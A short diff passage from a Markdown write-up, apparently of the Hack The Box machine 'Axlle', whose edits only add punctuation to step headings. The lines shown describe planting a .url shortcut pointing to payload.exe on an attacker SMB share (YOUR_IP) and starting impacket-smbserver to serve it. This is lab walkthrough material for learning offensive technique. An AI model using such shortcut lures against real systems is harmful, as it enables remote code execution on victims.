K-Scorpio/scorpiosec/content/en/posts/HTB-Axlle.md

 run
 ```

-3. Create the `.url` file with the following content
+3. Create the `.url` file with the following content.

 ```
 [InternetShortcut]
 URL=file://YOUR_IP/share/payload.exe
 ```

-4. Start a SMB server and a web server
+4. Start a SMB server and a web server.

 ```
 impacket-smbserver -smb2support share .